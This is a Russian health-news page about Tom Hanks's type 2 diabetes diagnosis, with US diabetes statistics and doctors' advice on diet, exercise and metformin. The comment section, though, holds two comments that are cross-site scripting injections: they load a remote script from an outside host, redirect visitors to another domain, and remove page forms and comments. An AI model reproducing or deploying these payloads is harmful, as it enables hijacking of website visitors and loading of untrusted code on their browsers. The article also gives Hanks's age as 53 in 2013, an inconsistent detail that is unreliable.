Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  У Тома Хэнкса диабет  >>  У Тома Хэнкса диабет
 
Обратная связь
 

У Тома Хэнкса диабет

Размер шрифта
22 ноября 2013 00:00
Юрий Малышев
Здоровье инфо
Екатерина Иванникова
Здоровье инфо
  • google_analytics: false
  • Нравится

Известный актер Том Хэнкс, которому в этом году исполнилось 53 года, заявил, что болен сахарным диабетом 2 типа. В программе «Шоу с Дэвидом Леттерамном» Том Хэнкс рассказал свою историю диабета.

У Тома Хэнкса Диабет

«Доктор впервые сообщил мне о высоком сахаре в крови, когда мне было еще 36 лет. Возможно, я заболел, так как резко поправился». Когда начались съемки фильма «Их собственная лига», Хэнкс в 1992 году поправился более чем на 15 килограмм. А спустя 8 лет похудел на 25 килограмм, чтобы великолепно сыграть жителя необитаемого острова в «Изгое». Диабет у актера развивался постепенно, в течение 20 лет.

Американская диабетическая ассоциация сообщает, что в Соединенных Штатах диабетом больны около 25,8 млн детей и взрослых (8% населения). У большинства из них сахарный диабет 2 типа. Однако только 19 млн регулярно наблюдаются у врачей и принимают препараты. Остальные даже не подозревают о наличии у них высокого сахара в крови или не хотят лечиться. При сахарном диабете 2 типа сахар растет, поскольку необходимый для его утилизации инсулин уже не работает. Избыточный вес, сидячий образ жизни, неправильное питание вызывают развитие диабета 2 типа. Хотя для профилактики вполне достаточно соблюдать простые правила: ограничить потребление углеводов, выполнять физические упражнения и отказаться от вредных привычек.

Хэнкс в интервью Леттерману рассказал, что даже не рассчитывал на похудение как на метод лечения. «Мой врач сказал мне, что если мой вес станет таким же, как в школе, то диабет не разовьется и мне не надо будет принимать лекарства. Я сказал, что нет такого способа, чтобы мой вес был 60 килограмм», – сказал Хэнкс. Директор института диабета в университете Уинтроп доктор Вирджиния Перагалло-Дитко сообщила о подробностях предыстории развития диабета у Хэнкса. «У него был шанс в течение этих 20 лет предотвратить развитие диабета, но он не захотел. Он мог снизить свой вес с помощью диеты и увеличения физической активности до 150 минут в неделю. Именно избыточный вес, а не его колебания привели к таким страшным последствиям», – сообщила доктор. «Также имеет значение наследственный фактор и привычный сидячий образ жизни. Не обязательно худеть быстро, вполне достаточно для начала похудеть на 5-7%», – говорит она. Сахароснижающие препараты, в том числе и инъекции инсулина, назначают тем пациентам, которые уже не могут контролировать свой уровень сахара в крови с помощью диеты. Неконтролируемый диабет может привести к развитию смертельных осложнений, такие как ампутации нижних конечностей, болезни сердца и почек. Главный эндокринолог в Бруклине доктор Яков Ворман прокомментировал: «Диабет развивается постепенно. Его можно легко контролировать с помощью соблюдения диеты, приема препаратов и выполнения простых физических упражнений. Люди с диабетом должны держаться подальше от легкоусвояемых углеводов и жирных продуктов. Применение препаратов нового поколения, таких как метформин, позволяет бороться с развитием инвалидизирующих осложнений и необходимости введения инсулина».

Вся правда о сахарном диабете в нашем специальном проекте!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:52

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:52

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Спасите мужа от просмотра футбола   Лицо футболиста предскажет победителя Финала Лиги Чемпионов!   Как успеть все по науке?   Как понять, что вы пьете слишком много? Или уже спиваетесь?  
31 июля 2012Сахарный диабет можно вылечить с помощью одного укола! 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
9 мифов о диабете
5 отговорок, которые убивают ваше сердце и мешают похудеть
Почему вы не можете похудеть? 10 причин!

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Есть ли у вас скрытый риск диабета?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.